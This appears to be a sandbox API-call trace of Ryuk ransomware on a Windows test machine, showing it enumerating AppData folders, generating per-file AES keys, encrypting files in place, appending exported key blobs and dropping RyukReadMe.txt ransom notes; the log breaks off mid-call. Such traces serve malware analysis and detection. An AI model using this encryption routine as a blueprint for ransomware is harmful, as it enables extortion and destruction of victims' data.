[0141.645] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.645] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.645] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.645] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.645] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.645] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]", dwFileAttributes=0x80) returned 1 [0141.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.646] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=0) returned 1 [0141.646] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=0) returned 1 [0141.646] CloseHandle (hObject=0x198) returned 1 [0141.646] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.647] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.647] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.647] SetLastError (dwErrCode=0x0) [0141.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\6ASVN7J7\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\6asvn7j7\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.647] GetLastError () returned 0x0 [0141.647] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.648] CloseHandle (hObject=0x194) returned 1 [0141.648] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.648] SetLastError (dwErrCode=0x0) [0141.648] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.648] GetLastError () returned 0xb7 [0141.648] CloseHandle (hObject=0x194) returned 1 [0141.648] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.649] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.649] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.649] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.649] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.649] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]", dwFileAttributes=0x80) returned 1 [0141.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.649] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=0) returned 1 [0141.649] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=0) returned 1 [0141.649] CloseHandle (hObject=0x198) returned 1 [0141.649] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.650] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.650] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.650] SetLastError (dwErrCode=0x0) [0141.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\D68G7BIJ\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\d68g7bij\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.650] GetLastError () returned 0x0 [0141.650] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.651] CloseHandle (hObject=0x194) returned 1 [0141.651] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.651] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.651] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.652] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat", dwFileAttributes=0x80) returned 1 [0141.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.655] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=32768) returned 1 [0141.655] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=32768) returned 1 [0141.655] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x7ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.656] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0141.657] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.657] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0141.657] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.657] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.657] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x8000, lpOverlapped=0x0) returned 1 [0141.658] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0141.658] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x8000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x8010) returned 1 [0141.658] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.658] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x8010, lpOverlapped=0x0) returned 1 [0141.659] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0141.659] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.659] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.659] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0141.659] CloseHandle (hObject=0x194) returned 1 [0141.681] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.686] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.686] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.686] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.686] SetLastError (dwErrCode=0x0) [0141.686] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.686] GetLastError () returned 0xb7 [0141.686] CloseHandle (hObject=0x194) returned 1 [0141.686] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0141.687] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.687] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.687] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.687] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.687] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]", dwFileAttributes=0x80) returned 1 [0141.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.688] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=0) returned 1 [0141.688] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=0) returned 1 [0141.688] CloseHandle (hObject=0x198) returned 1 [0141.688] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.688] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0141.688] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.688] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\ieonline.microsoft[1]", dwFileAttributes=0x80) returned 1 [0141.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\ieonline.microsoft[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\ieonline.microsoft[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0141.689] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=0) returned 1 [0141.689] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=0) returned 1 [0141.689] CloseHandle (hObject=0x198) returned 1 [0141.689] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.689] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0141.689] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0141.689] SetLastError (dwErrCode=0x0) [0141.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.694] GetLastError () returned 0x0 [0141.694] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0141.695] CloseHandle (hObject=0x194) returned 1 [0141.695] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.695] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.695] SetLastError (dwErrCode=0x0) [0141.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.695] GetLastError () returned 0xb7 [0141.695] CloseHandle (hObject=0x190) returned 1 [0141.695] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.695] SetLastError (dwErrCode=0x0) [0141.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.696] GetLastError () returned 0xb7 [0141.696] CloseHandle (hObject=0x190) returned 1 [0141.696] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.696] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.696] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.696] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0141.697] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT", dwFileAttributes=0x80) returned 1 [0141.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\frmcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0141.698] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=245980) returned 1 [0141.698] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=245980) returned 1 [0141.698] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x3bfba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.698] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0141.699] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.699] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0141.700] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0141.700] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.700] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x3c0dc, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x3c0dc, lpOverlapped=0x0) returned 1 [0141.705] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0141.705] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x3c0dc, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x3c0e0) returned 1 [0141.708] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.708] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x3c0e0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x3c0e0, lpOverlapped=0x0) returned 1 [0141.709] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0141.709] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.709] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0141.709] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0141.709] CloseHandle (hObject=0x194) returned 1 [0141.740] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.744] CryptDestroyKey (hKey=0x3b8690) returned 1 [0141.744] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.744] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.744] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.744] SetLastError (dwErrCode=0x0) [0141.744] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\FORMS\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\forms\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.745] GetLastError () returned 0x0 [0141.745] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.746] CloseHandle (hObject=0x190) returned 1 [0141.746] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.746] SetLastError (dwErrCode=0x0) [0141.746] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.746] GetLastError () returned 0xb7 [0141.747] CloseHandle (hObject=0x190) returned 1 [0141.747] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.747] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.747] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.747] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.747] SetLastError (dwErrCode=0x0) [0141.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IME12\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ime12\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.747] GetLastError () returned 0x0 [0141.747] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0141.748] CloseHandle (hObject=0x190) returned 1 [0141.748] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0141.748] SetLastError (dwErrCode=0x0) [0141.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0141.748] GetLastError () returned 0xb7 [0141.748] CloseHandle (hObject=0x190) returned 1 [0141.749] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0141.749] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0141.749] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0141.749] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0141.750] SetLastError (dwErrCode=0x0) [0141.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\IMJP12\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\imjp12\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, 